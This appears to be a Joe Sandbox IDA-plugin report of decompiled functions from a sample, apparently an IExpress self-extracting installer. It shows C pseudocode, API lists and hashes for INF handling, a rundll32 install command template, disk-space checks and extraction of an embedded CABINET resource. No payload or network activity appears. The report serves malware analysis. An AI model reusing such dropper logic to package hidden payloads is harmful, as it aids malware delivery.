                            							}
                            						} else {
                            							_t85 = GetFileAttributesA( &_v268);
                            							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                            								_t140 = 0x525;
                            								_push(0);
                            								_push(0x10);
                            								_push(0);
                            								_t60 =  &_v268;
                            								goto L35;
                            							} else {
                            								_t140 = "[";
                            								_v1556 = _t151;
                            								_t90 = E00EB1A84( &_v1556, "[");
                            								if(_t90 != 0) {
                            									if( *_t90 != 0) {
                            										_v1556 = _t90;
                            									}
                            									_t140 = "]";
                            									E00EB1A84( &_v1556, "]");
                            								}
                            								_t156 = LocalAlloc(0x40, 0x200);
                            								if(_t156 == 0) {
                            									L43:
                            									_t60 = 0;
                            									_t140 = 0x4b5;
                            									_push(0);
                            									_push(0x10);
                            									_push(0);
                            									L35:
                            									_push(_t60);
                            									E00EB44B9(0, _t140);
                            									_t62 = 0;
                            									goto L54;
                            								} else {
                            									_t155 = _v1556;
                            									_t92 = _t155;
                            									if( *_t155 == 0) {
                            										_t92 = "DefaultInstall";
                            									}
                            									 *0xeb9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                            									 *_v1560 = 1;
                            									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xeb1140, _t156, 8,  &_v268) == 0) {
                            										 *0xeb9a34 =  *0xeb9a34 & 0xfffffffb;
                            										if( *0xeb9a40 != 0) {
                            											_t108 = "setupapi.dll";
                            										} else {
                            											_t108 = "setupx.dll";
                            											GetShortPathNameA( &_v268,  &_v268, 0x104);
                            										}
                            										if( *_t155 == 0) {
                            											_t155 = "DefaultInstall";
                            										}
                            										_push( &_v268);
                            										_push(_t155);
                            										E00EB171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                            									} else {
                            										 *0xeb9a34 =  *0xeb9a34 | 0x00000004;
                            										if( *_t155 == 0) {
                            											_t155 = "DefaultInstall";
                            										}
                            										E00EB1680(_t108, 0x104, _t155);
                            										_t140 = 0x200;
                            										E00EB1680(_t156, 0x200,  &_v268);
                            									}
                            									L53:
                            									_t62 = 1;
                            									 *_v1564 = _t156;
                            									L54:
                            									_pop(_t152);
                            									return E00EB6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                            								}
                            							}
                            						}
                            					}
                            				}
                            			}














































                            0x00eb1af3
                            0x00eb1afa
                            0x00eb1b07
                            0x00eb1b09
                            0x00eb1b1a
                            0x00eb1b20
                            0x00eb1b2c
                            0x00eb1b3b
                            0x00eb1b40
                            0x00eb1b2e
                            0x00eb1b2e
                            0x00eb1b33
                            0x00eb1b33
                            0x00eb1b46
                            0x00eb1b4c
                            0x00eb1b52
                            0x00eb1b57
                            0x00eb1b5d
                            0x00eb1b61
                            0x00eb1b9f
                            0x00eb1b9f
                            0x00eb1bb1
                            0x00eb1bc2
                            0x00000000
                            0x00eb1b63
                            0x00eb1b63
                            0x00eb1b65
                            0x00eb1b68
                            0x00eb1b68
                            0x00eb1b6a
                            0x00eb1b6b
                            0x00eb1b6f
                            0x00eb1b74
                            0x00000000
                            0x00000000
                            0x00eb1b76
                            0x00eb1b7b
                            0x00eb1b86
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb1b8c
                            0x00eb1b8c
                            0x00eb1b98
                            0x00eb1bc7
                            0x00eb1bc9
                            0x00eb1bcc
                            0x00eb1bd3
                            0x00eb1d75
                            0x00eb1d76
                            0x00eb1d78
                            0x00eb1d7f
                            0x00eb1e05
                            0x00eb1e09
                            0x00000000
                            0x00000000
                            0x00eb1e12
                            0x00eb1e1b
                            0x00eb1e73
                            0x00eb1e21
                            0x00eb1e21
                            0x00eb1e28
                            0x00eb1e37
                            0x00eb1e3e
                            0x00eb1e52
                            0x00eb1e60
                            0x00eb1e60
                            0x00eb1e3e
                            0x00eb1e79
                            0x00eb1e7b
                            0x00eb1e84
                            0x00000000
                            0x00eb1d9b
                            0x00eb1d9b
                            0x00eb1da0
                            0x00eb1da2
                            0x00eb1da5
                            0x00eb1da5
                            0x00eb1da7
                            0x00eb1da8
                            0x00eb1dac
                            0x00eb1dae
                            0x00eb1db4
                            0x00eb1db7
                            0x00eb1db7
                            0x00eb1db9
                            0x00eb1dba
                            0x00eb1dbe
                            0x00eb1dc3
                            0x00eb1dce
                            0x00eb1dd2
                            0x00eb1deb
                            0x00000000
                            0x00eb1df0
                            0x00000000
                            0x00eb1dd2
                            0x00eb1bf7
                            0x00eb1bfe
                            0x00eb1c07
                            0x00eb1d55
                            0x00eb1d5a
                            0x00eb1d5b
                            0x00eb1d5d
                            0x00eb1d5e
                            0x00000000
                            0x00eb1c1b
                            0x00eb1c1b
                            0x00eb1c20
                            0x00eb1c2c
                            0x00eb1c33
                            0x00eb1c38
                            0x00eb1c3a
                            0x00eb1c3a
                            0x00eb1c40
                            0x00eb1c4b
                            0x00eb1c4b
                            0x00eb1c5d
                            0x00eb1c61
                            0x00eb1dd4
                            0x00eb1dd4
                            0x00eb1dd6
                            0x00eb1ddb
                            0x00eb1ddc
                            0x00eb1dde
                            0x00eb1d64
                            0x00eb1d64
                            0x00eb1d67
                            0x00eb1d6c
                            0x00000000
                            0x00eb1c67
                            0x00eb1c67
                            0x00eb1c6d
                            0x00eb1c72
                            0x00eb1c74
                            0x00eb1c74
                            0x00eb1c8e
                            0x00eb1c99
                            0x00eb1cc0
                            0x00eb1cf8
                            0x00eb1d07
                            0x00eb1d23
                            0x00eb1d09
                            0x00eb1d14
                            0x00eb1d1b
                            0x00eb1d1b
                            0x00eb1d2b
                            0x00eb1d2d
                            0x00eb1d2d
                            0x00eb1d38
                            0x00eb1d39
                            0x00eb1d46
                            0x00eb1cc2
                            0x00eb1cc2
                            0x00eb1ccc
                            0x00eb1cce
                            0x00eb1cce
                            0x00eb1cdb
                            0x00eb1ce6
                            0x00eb1cee
                            0x00eb1cee
                            0x00eb1e89
                            0x00eb1e91
                            0x00eb1e92
                            0x00eb1e94
                            0x00eb1e97
                            0x00eb1ea4
                            0x00eb1ea4
                            0x00eb1c61
                            0x00eb1c07
                            0x00eb1bd3
                            0x00eb1b7b

                            APIs
                            • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00EB1BE7
                            • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00EB1BFE
                            • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00EB1C57
                            • GetPrivateProfileIntA.KERNEL32 ref: 00EB1C88
                            • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00EB1140,00000000,00000008,?), ref: 00EB1CB8
                            • GetShortPathNameA.KERNEL32 ref: 00EB1D1B
                              • Part of subcall function 00EB44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00EB4518
                              • Part of subcall function 00EB44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00EB4554
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                            • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                            • API String ID: 383838535-3060569371
                            • Opcode ID: eff5a87808329892c1418b358d6c705e00f492cd9506109e4633a71f1e015207
                            • Instruction ID: 8da6abc25dd2898e4161c24d25b0b2db092e1f0407199c57abf5dd9638eac3fd
                            • Opcode Fuzzy Hash: eff5a87808329892c1418b358d6c705e00f492cd9506109e4633a71f1e015207
                            • Instruction Fuzzy Hash: 4AA14B70A003146FEF219B28CC65BEB77A9DB81334F9412E5E555B32D1DBB09E89CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 324 eb597d-eb59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 eb59bb-eb59d8 call eb44b9 call eb6285 324->325 326 eb59dd-eb5a1b GetDiskFreeSpaceA 324->326 341 eb5c05-eb5c14 call eb6ce0 325->341 328 eb5ba1-eb5bde memset call eb6285 GetLastError FormatMessageA 326->328 329 eb5a21-eb5a4a MulDiv 326->329 338 eb5be3-eb5bfc call eb44b9 SetCurrentDirectoryA 328->338 329->328 332 eb5a50-eb5a6c GetVolumeInformationA 329->332 335 eb5a6e-eb5ab0 memset call eb6285 GetLastError FormatMessageA 332->335 336 eb5ab5-eb5aca SetCurrentDirectoryA 332->336 335->338 340 eb5acc-eb5ad1 336->340 352 eb5c02 338->352 344 eb5ad3-eb5ad8 340->344 345 eb5ae2-eb5ae4 340->345 344->345 347 eb5ada-eb5ae0 344->347 349 eb5ae7-eb5af8 345->349 350 eb5ae6 345->350 347->340 347->345 351 eb5af9-eb5afb 349->351 350->349 354 eb5afd-eb5b03 351->354 355 eb5b05-eb5b08 351->355 356 eb5c04 352->356 354->351 354->355 357 eb5b0a-eb5b1b call eb44b9 355->357 358 eb5b20-eb5b27 355->358 356->341 357->352 360 eb5b29-eb5b33 358->360 361 eb5b52-eb5b5b 358->361 360->361 363 eb5b35-eb5b50 360->363 364 eb5b62-eb5b6d 361->364 363->364 365 eb5b6f-eb5b74 364->365 366 eb5b76-eb5b7d 364->366 367 eb5b85 365->367 368 eb5b7f-eb5b81 366->368 369 eb5b83 366->369 370 eb5b87-eb5b94 call eb268b 367->370 371 eb5b96-eb5b9f 367->371 368->367 369->367 370->356 371->356
                            C-Code - Quality: 96%
                            			E00EB597D(CHAR* __ecx, signed char __edx, void* __edi, char _a4) {
                            				signed int _v8;
                            				char _v16;
                            				char _v276;
                            				char _v788;
                            				long _v792;
                            				long _v796;
                            				long _v800;
                            				signed int _v804;
                            				long _v808;
                            				int _v812;
                            				long _v816;
                            				long _v820;
                            				void* __ebx;
                            				void* __esi;
                            				signed int _t46;
                            				int _t50;
                            				signed int _t55;
                            				void* _t66;
                            				int _t69;
                            				signed int _t73;
                            				signed short _t78;
                            				signed int _t87;
                            				signed int _t101;
                            				int _t102;
                            				unsigned int _t103;
                            				unsigned int _t105;
                            				signed int _t111;
                            				long _t112;
                            				signed int _t116;
                            				CHAR* _t118;
                            				signed int _t119;
                            				signed int _t120;
                            
                            				_t114 = __edi;
                            				_t46 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t46 ^ _t120;
                            				_v804 = __edx;
                            				_t118 = __ecx;
                            				GetCurrentDirectoryA(0x104,  &_v276);
                            				_t50 = SetCurrentDirectoryA(_t118); // executed
                            				if(_t50 != 0) {
                            					_push(__edi);
                            					_v796 = 0;
                            					_v792 = 0;
                            					_v800 = 0;
                            					_v808 = 0;
                            					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                            					__eflags = _t55;
                            					if(_t55 == 0) {
                            						L29:
                            						memset( &_v788, 0, 0x200);
                            						 *0xeb9124 = E00EB6285();
                            						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                            						_t110 = 0x4b0;
                            						L30:
                            						__eflags = 0;
                            						E00EB44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                            						SetCurrentDirectoryA( &_v276);
                            						L31:
                            						_t66 = 0;
                            						__eflags = 0;
                            						L32:
                            						_pop(_t114);
                            						goto L33;
                            					}
                            					_t69 = _v792 * _v796;
                            					_v812 = _t69;
                            					_t116 = MulDiv(_t69, _v800, 0x400);
                            					__eflags = _t116;
                            					if(_t116 == 0) {
                            						goto L29;
                            					}
                            					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                            					__eflags = _t73;
                            					if(_t73 != 0) {
                            						SetCurrentDirectoryA( &_v276); // executed
                            						_t101 =  &_v16;
                            						_t111 = 6;
                            						_t119 = _t118 - _t101;
                            						__eflags = _t119;
                            						while(1) {
                            							_t22 = _t111 - 4; // 0x2
                            							__eflags = _t22;
                            							if(_t22 == 0) {
                            								break;
                            							}
                            							_t87 =  *((intOrPtr*)(_t119 + _t101));
                            							__eflags = _t87;
                            							if(_t87 == 0) {
                            								break;
                            							}
                            							 *_t101 = _t87;
                            							_t101 = _t101 + 1;
                            							_t111 = _t111 - 1;
                            							__eflags = _t111;
                            							if(_t111 != 0) {
                            								continue;
                            							}
                            							break;
                            						}
                            						__eflags = _t111;
                            						if(_t111 == 0) {
                            							_t101 = _t101 - 1;
                            							__eflags = _t101;
                            						}
                            						 *_t101 = 0;
                            						_t112 = 0x200;
                            						_t102 = _v812;
                            						_t78 = 0;
                            						_t118 = 8;
                            						while(1) {
                            							__eflags = _t102 - _t112;
                            							if(_t102 == _t112) {
                            								break;
                            							}
                            							_t112 = _t112 + _t112;
                            							_t78 = _t78 + 1;
                            							__eflags = _t78 - _t118;
                            							if(_t78 < _t118) {
                            								continue;
                            							}
                            							break;
                            						}
                            						__eflags = _t78 - _t118;
                            						if(_t78 != _t118) {
                            							__eflags =  *0xeb9a34 & 0x00000008;
                            							if(( *0xeb9a34 & 0x00000008) == 0) {
                            								L20:
                            								_t103 =  *0xeb9a38; // 0x0
                            								_t110 =  *((intOrPtr*)(0xeb89e0 + (_t78 & 0x0000ffff) * 4));
                            								L21:
                            								__eflags = (_v804 & 0x00000003) - 3;
                            								if((_v804 & 0x00000003) != 3) {
                            									__eflags = _v804 & 0x00000001;
                            									if((_v804 & 0x00000001) == 0) {
                            										__eflags = _t103 - _t116;
                            									} else {
                            										__eflags = _t110 - _t116;
                            									}
                            								} else {
                            									__eflags = _t103 + _t110 - _t116;
                            								}
                            								if(__eflags <= 0) {
                            									 *0xeb9124 = 0;
                            									_t66 = 1;
                            								} else {
                            									_t40 =  &_a4; // 0xeb6277
                            									_t66 = E00EB268B( *_t40, _t110, _t103,  &_v16);
                            								}
                            								goto L32;
                            							}
                            							__eflags = _v816 & 0x00008000;
                            							if((_v816 & 0x00008000) == 0) {
                            								goto L20;
                            							}
                            							_t105 =  *0xeb9a38; // 0x0
                            							_t110 =  *((intOrPtr*)(0xeb89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xeb89e0 + (_t78 & 0x0000ffff) * 4));
                            							_t103 = (_t105 >> 2) +  *0xeb9a38;
                            							goto L21;
                            						}
                            						_t110 = 0x4c5;
                            						E00EB44B9(0, 0x4c5, 0, 0, 0x10, 0);
                            						goto L31;
                            					}
                            					memset( &_v788, 0, 0x200);
                            					 *0xeb9124 = E00EB6285();
                            					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                            					_t110 = 0x4f9;
                            					goto L30;
                            				} else {
                            					_t110 = 0x4bc;
                            					E00EB44B9(0, 0x4bc, 0, 0, 0x10, 0);
                            					 *0xeb9124 = E00EB6285();
                            					_t66 = 0;
                            					L33:
                            					return E00EB6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                            				}
                            			}



































                            0x00eb597d
                            0x00eb5988
                            0x00eb598f
                            0x00eb599a
                            0x00eb59a6
                            0x00eb59a8
                            0x00eb59af
                            0x00eb59b9
                            0x00eb59dd
                            0x00eb59e4
                            0x00eb59f1
                            0x00eb59fe
                            0x00eb5a0b
                            0x00eb5a13
                            0x00eb5a19
                            0x00eb5a1b
                            0x00eb5ba1
                            0x00eb5baf
                            0x00eb5bbd
                            0x00eb5bd8
                            0x00eb5bde
                            0x00eb5be3
                            0x00eb5bec
                            0x00eb5bf0
                            0x00eb5bfc
                            0x00eb5c02
                            0x00eb5c02
                            0x00eb5c02
                            0x00eb5c04
                            0x00eb5c04
                            0x00000000
                            0x00eb5c04
                            0x00eb5a27
                            0x00eb5a3a
                            0x00eb5a46
                            0x00eb5a48
                            0x00eb5a4a
                            0x00000000
                            0x00000000
                            0x00eb5a64
                            0x00eb5a6a
                            0x00eb5a6c
                            0x00eb5abc
                            0x00eb5ac2
                            0x00eb5ac9
                            0x00eb5aca
                            0x00eb5aca
                            0x00eb5acc
                            0x00eb5acc
                            0x00eb5acf
                            0x00eb5ad1
                            0x00000000
                            0x00000000
                            0x00eb5ad3
                            0x00eb5ad6
                            0x00eb5ad8
                            0x00000000
                            0x00000000
                            0x00eb5ada
                            0x00eb5adc
                            0x00eb5add
                            0x00eb5add
                            0x00eb5ae0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb5ae0
                            0x00eb5ae2
                            0x00eb5ae4
                            0x00eb5ae6
                            0x00eb5ae6
                            0x00eb5ae6
                            0x00eb5ae9
                            0x00eb5aeb
                            0x00eb5af0
                            0x00eb5af6
                            0x00eb5af8
                            0x00eb5af9
                            0x00eb5af9
                            0x00eb5afb
                            0x00000000
                            0x00000000
                            0x00eb5afd
                            0x00eb5aff
                            0x00eb5b00
                            0x00eb5b03
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb5b03
                            0x00eb5b05
                            0x00eb5b08
                            0x00eb5b20
                            0x00eb5b27
                            0x00eb5b52
                            0x00eb5b52
                            0x00eb5b5b
                            0x00eb5b62
                            0x00eb5b6b
                            0x00eb5b6d
                            0x00eb5b76
                            0x00eb5b7d
                            0x00eb5b83
                            0x00eb5b7f
                            0x00eb5b7f
                            0x00eb5b7f
                            0x00eb5b6f
                            0x00eb5b72
                            0x00eb5b72
                            0x00eb5b85
                            0x00eb5b98
                            0x00eb5b9e
                            0x00eb5b87
                            0x00eb5b8c
                            0x00eb5b8f
                            0x00eb5b8f
                            0x00000000
                            0x00eb5b85
                            0x00eb5b29
                            0x00eb5b33
                            0x00000000
                            0x00000000
                            0x00eb5b35
                            0x00eb5b48
                            0x00eb5b4a
                            0x00000000
                            0x00eb5b4a
                            0x00eb5b0f
                            0x00eb5b16
                            0x00000000
                            0x00eb5b16
                            0x00eb5a7c
                            0x00eb5a8a
                            0x00eb5aa5
                            0x00eb5aab
                            0x00000000
                            0x00eb59bb
                            0x00eb59c0
                            0x00eb59c7
                            0x00eb59d1
                            0x00eb59d6
                            0x00eb5c05
                            0x00eb5c14
                            0x00eb5c14

                            APIs
                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00EB59A8
                            • SetCurrentDirectoryA.KERNELBASE(?), ref: 00EB59AF
                            • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00EB5A13
                            • MulDiv.KERNEL32(?,?,00000400), ref: 00EB5A40
                            • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00EB5A64
                            • memset.MSVCRT ref: 00EB5A7C
                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00EB5A98
                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00EB5AA5
                            • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00EB5BFC
                              • Part of subcall function 00EB44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00EB4518
                              • Part of subcall function 00EB44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00EB4554
                              • Part of subcall function 00EB6285: GetLastError.KERNEL32(00EB5BBC), ref: 00EB6285
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                            • String ID: wb
                            • API String ID: 4237285672-1758207633
                            • Opcode ID: 7c8eb2e6d82eb586090f118fb73c627dd16676ddb195036bdad09f86148140ba
                            • Instruction ID: 026e3ae3fc0247dd6a8865ecb25b1de6cb21815ff977cc1568cc0ab6433692a4
                            • Opcode Fuzzy Hash: 7c8eb2e6d82eb586090f118fb73c627dd16676ddb195036bdad09f86148140ba
                            • Instruction Fuzzy Hash: ED71B2B290020CAFEB169F64DCC5FFBB7ADEB48344F1451A9F545F2141EA309E898B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 374 eb4fe0-eb501a call eb468f FindResourceA LoadResource LockResource 377 eb5161-eb5163 374->377 378 eb5020-eb5027 374->378 379 eb5029-eb5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 eb5057-eb505e call eb4efd 378->380 379->380 383 eb507c-eb50b4 380->383 384 eb5060-eb5077 call eb44b9 380->384 388 eb50e8-eb5104 call eb44b9 383->388 389 eb50b6-eb50da 383->389 390 eb5107-eb510e 384->390 402 eb5106 388->402 401 eb50dc 389->401 389->402 392 eb511d-eb511f 390->392 393 eb5110-eb5117 FreeResource 390->393 396 eb513a-eb5141 392->396 397 eb5121-eb5127 392->397 393->392 399 eb515f 396->399 400 eb5143-eb514a 396->400 397->396 398 eb5129-eb5135 call eb44b9 397->398 398->396 399->377 400->399 404 eb514c-eb5159 SendMessageA 400->404 405 eb50e3-eb50e6 401->405 402->390 404->399 405->388 405->402
                            C-Code - Quality: 77%
                            			E00EB4FE0(void* __edi, void* __eflags) {
                            				void* __ebx;
                            				void* _t8;
                            				struct HWND__* _t9;
                            				int _t10;
                            				void* _t12;
                            				struct HWND__* _t24;
                            				struct HWND__* _t27;
                            				intOrPtr _t29;
                            				void* _t33;
                            				int _t34;
                            				CHAR* _t36;
                            				int _t37;
                            				intOrPtr _t47;
                            
                            				_t33 = __edi;
                            				_t36 = "CABINET";
                            				 *0xeb9144 = E00EB468F(_t36, 0, 0);
                            				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                            				 *0xeb9140 = _t8;
                            				if(_t8 == 0) {
                            					return _t8;
                            				}
                            				_t9 =  *0xeb8584; // 0x0
                            				if(_t9 != 0) {
                            					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                            					ShowWindow(GetDlgItem( *0xeb8584, 0x841), 5);
                            				}
                            				_t10 = E00EB4EFD(0, 0);
                            				if(_t10 != 0) {
                            					__imp__#20(E00EB4CA0, E00EB4CC0, E00EB4980, E00EB4A50, E00EB4AD0, E00EB4B60, E00EB4BC0, 1, 0xeb9148, _t33);
                            					_t34 = _t10;
                            					if(_t34 == 0) {
                            						L8:
                            						_t29 =  *0xeb9148; // 0x0
                            						_t24 =  *0xeb8584; // 0x0
                            						E00EB44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                            						_t37 = 0;
                            						L9:
                            						goto L10;
                            					}
                            					__imp__#22(_t34, "*MEMCAB", 0xeb1140, 0, E00EB4CD0, 0, 0xeb9140); // executed
                            					_t37 = _t10;
                            					if(_t37 == 0) {
                            						goto L9;
                            					}
                            					__imp__#23(_t34); // executed
                            					if(_t10 != 0) {
                            						goto L9;
                            					}
                            					goto L8;
                            				} else {
                            					_t27 =  *0xeb8584; // 0x0
                            					E00EB44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                            					_t37 = 0;
                            					L10:
                            					_t12 =  *0xeb9140; // 0x0
                            					if(_t12 != 0) {
                            						FreeResource(_t12);
                            						 *0xeb9140 = 0;
                            					}
                            					if(_t37 == 0) {
                            						_t47 =  *0xeb91d8; // 0x0
                            						if(_t47 == 0) {
                            							E00EB44B9(0, 0x4f8, 0, 0, 0x10, 0);
                            						}
                            					}
                            					if(( *0xeb8a38 & 0x00000001) == 0 && ( *0xeb9a34 & 0x00000001) == 0) {
                            						SendMessageA( *0xeb8584, 0xfa1, _t37, 0);
                            					}
                            					return _t37;
                            				}
                            			}
















                            0x00eb4fe0
                            0x00eb4fe6
                            0x00eb4ff9
                            0x00eb500d
                            0x00eb5013
                            0x00eb501a
                            0x00eb5163
                            0x00eb5163
                            0x00eb5020
                            0x00eb5027
                            0x00eb5037
                            0x00eb5051
                            0x00eb5051
                            0x00eb5057
                            0x00eb505e
                            0x00eb50a7
                            0x00eb50ad
                            0x00eb50b4
                            0x00eb50e8
                            0x00eb50e8
                            0x00eb50ee
                            0x00eb50ff
                            0x00eb5104
                            0x00eb5106
                            0x00000000
                            0x00eb5106
                            0x00eb50cd
                            0x00eb50d3
                            0x00eb50da
                            0x00000000
                            0x00000000
                            0x00eb50dd
                            0x00eb50e6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb5060
                            0x00eb5060
                            0x00eb5070
                            0x00eb5075
                            0x00eb5107
                            0x00eb5107
                            0x00eb510e
                            0x00eb5111
                            0x00eb5117
                            0x00eb5117
                            0x00eb511f
                            0x00eb5121
                            0x00eb5127
                            0x00eb5135
                            0x00eb5135
                            0x00eb5127
                            0x00eb5141
                            0x00eb5159
                            0x00eb5159
                            0x00000000
                            0x00eb515f

                            APIs
                              • Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46A0
                              • Part of subcall function 00EB468F: SizeofResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46A9
                              • Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46C3
                              • Part of subcall function 00EB468F: LoadResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46CC
                              • Part of subcall function 00EB468F: LockResource.KERNEL32(00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46D3
                              • Part of subcall function 00EB468F: memcpy_s.MSVCRT ref: 00EB46E5
                              • Part of subcall function 00EB468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46EF
                            • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00EB4FFE
                            • LoadResource.KERNEL32(00000000,00000000), ref: 00EB5006
                            • LockResource.KERNEL32(00000000), ref: 00EB500D
                            • GetDlgItem.USER32(00000000,00000842), ref: 00EB5030
                            • ShowWindow.USER32(00000000), ref: 00EB5037
                            • GetDlgItem.USER32(00000841,00000005), ref: 00EB504A
                            • ShowWindow.USER32(00000000), ref: 00EB5051
                            • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00EB5111
                            • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00EB5159
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                            • String ID: *MEMCAB$CABINET
                            • API String ID: 1305606123-2642027498
                            • Opcode ID: 551a6bd89c3ab9ad819e86956b84fc526ce5e1e3739161b4ad027f208cbdb819
                            • Instruction ID: 163d0eb012412f9c4b40e2fa24b8c4af638a91930076fb06a1636e80c3424c16
                            • Opcode Fuzzy Hash: 551a6bd89c3ab9ad819e86956b84fc526ce5e1e3739161b4ad027f208cbdb819
                            • Instruction Fuzzy Hash: A731ECF16427027FEB205B6BAD89FE7369CE744759F081224FA01B22E3DBB49C048A50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
